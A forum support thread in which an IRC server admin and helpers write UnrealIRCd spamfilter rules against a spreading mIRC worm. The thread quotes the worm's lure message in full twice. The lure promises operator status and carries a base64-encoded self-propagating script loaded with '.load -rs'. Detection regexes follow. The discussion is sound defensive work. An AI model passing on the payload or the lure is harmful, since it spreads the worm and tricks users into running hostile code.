i am having a advertise in my server ... some users do mass pvt ans send this msg .. and who ever types this a file auto creats in his mIRC which sends auto msg who ever join the specific channel ... so how can i add this thing in spamfilter . the advertise msg is :
<sunny> Do You Want to be an OPERATOR in #bangladesh ? copy/paste this->14 //write $decode(b24gMTp0ZXh0Oio6Izp7IC5pZ25vcmUgJG5pY2sgfCAudGltZXKgIDAgMTIwIC5qb2luICNNYW5pbGEgfCAubXNnICRuaWNrIERvIFlvdSBXYW50IHRvIGJlIGFuIE9QRVJBVE9SIGluICRjaGFuID8gY29weS9wYXN0ZSB0aGlzLT4DMTQgLy93cml0ZSCgICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyCgICRjaHIoMTI0KSAvL21vZGUgJCAkKyBtZSArUiB9,m) | .load -rs | //mode
thx in advance
-=GouroB=- https://www.shunno.info
Your complete web Solution
Irc.BanglaCafe.com
LargesT Chat server in BanglaDesH
spamfilter {
regex "^Do You Want to be an OPERATOR in #.+ \? copy/paste this->.+//write \$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode";
target {
private;
};
reason "Spamming users with an mIRC trojan.";
};
/SPAMFILTER ADD p block - Spamming_users_with_an_mIRC_trojan. ^Do You Want to be an OPERATOR in #.+ \? copy/paste this->.+//write \$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode
i set the second one u gave as i cant edit conf file now
this is ur exact one :-
/SPAMFILTER ADD cpnNPqa block - Spamming_users_with_an_mIRC_trojan. ^Do You
Want to be an OPERATOR in #.+ \? copy/paste this->.+//write
\$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode
and this is where i also add channel name :-
/SPAMFILTER ADD cpnNPqa block - Spamming_users_with_an_mIRC_trojan. ^Do You
Want to be an OPERATOR in #bangladesh \? copy/paste this->.+//write
\$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode
none of them worked . donno why
-=GouroB=- https://www.shunno.info
Your complete web Solution
Irc.BanglaCafe.com
LargesT Chat server in BanglaDesH
Dukat
yeah it worked for me aswell when i tried it with a clone , ofcourse without taking oper ... but after 2/3 mins i found some more users were sending same msg but spamfilter were not blocking their msg's .. i was like what the f*k !!
and as u said while adding spamfilter i added just p in action .. so that it blocks only pvt msg and they were sending the same msg in pvt .. while its added in spamfilter .
donno what the f*k is this thing but its not only happening in my server i found this in some other servers too .. its dangerous as far as i can understand ... and should take some serious actions against it . its still going on and i had to shun or gline my users .. so plz any one get me a way .
ok here is the cmd structure .. those i used in spamfilter.. and syzop i used block not shun
/SPAMFILTER ADD p block - Spamming_users_with_an_mIRC_trojan. ^Do You Want to be an OPERATOR in #.+ \? copy/paste this->.+//write \$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode
/SPAMFILTER ADD n block - Spamming_users_with_an_mIRC_trojan. ^Do You Want to be an OPERATOR in #.+ \? copy/paste this->.+//write \$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode
i used diff spamfilter for pvt notice and pvt msg .. so that they cant send that msg in pvt by any how . and i didnt add kill/gline coz most of the infected users r unknown from this problem of their scripts . thats y i added only block . am also giving u the /stats f out put in here ....
F n block 0 99344 86400 Spamming_users_with_an_mIRC_trojan. [nAi]![email protected] ^Do You Want to be an OPERATOR in #.+ \? copy/paste this->.+//write \$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode
F p block 0 99827 86400 Spamming_users_with_an_mIRC_trojan. [nAi]![email protected] ^Do You Want to be an OPERATOR in #.+ \? copy/paste this->.+//write \$decode\([A-Z0-9]+,m\) \| \.load -rs \| //mode
-=GouroB=- https://www.shunno.info
Your complete web Solution
Irc.BanglaCafe.com
LargesT Chat server in BanglaDesH
the same one , just added various colour codes in it ... giving u one of those pvt's in here ... and i found that this msg this started in Dalnet .... and we have a room there called #bangladesh ... so from there when users came to my server things spreaded in here too ,.. one of those add's again in below ...
<Austin> Do You Want to be an OPERATOR in #bangladesh ? copy/paste this-> //write $decode(4b24gMTp0ZXh0Oio6Izp7IC5pZ25vcmUgJG5pY2sgfCA12udGltZXKgIDAgMTIwIC5qb2luICNNYW5pbGEgfCAubXNnICRuaWNrIERvIFlvdSBXYW50IHRvIGJlIGFuIE9QRVJBVE9SIGluICRjaGFuID8gY29weS9wYXN0ZSB0aGlzLT4DMTQgLy93cml0ZSCgICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQ4pIC5sb2FkIC1ycyCgICRjaHIoMTI0KSAvL21vZGUgJCAkKyBtZSArUiB9,m) | .load -rs | //mode
-=GouroB=- https://www.shunno.info
Your complete web Solution
Irc.BanglaCafe.com
LargesT Chat server in BanglaDesH
Hm now that's odd.. get's blocked too here.
So that's in private message, right? Not in channel or anything.
And it's by a non-oper? (well, of course ;p).
Any pattern in them (the ones that get trough), like are they always/often from the same server? Or anything else?
syzop ,
those 2 spamfilter blocks .. almost 75 % of add's as i can get notice of soamfiletr in snotice window ... and some they cant block . but all of them r same msg's . just new colour codes .
am using unreal 3.2.2 ..... les hope for the best now .. what else can be done !
-=GouroB=- https://www.shunno.info
Your complete web Solution
Irc.BanglaCafe.com
LargesT Chat server in BanglaDesH
is me GouroB
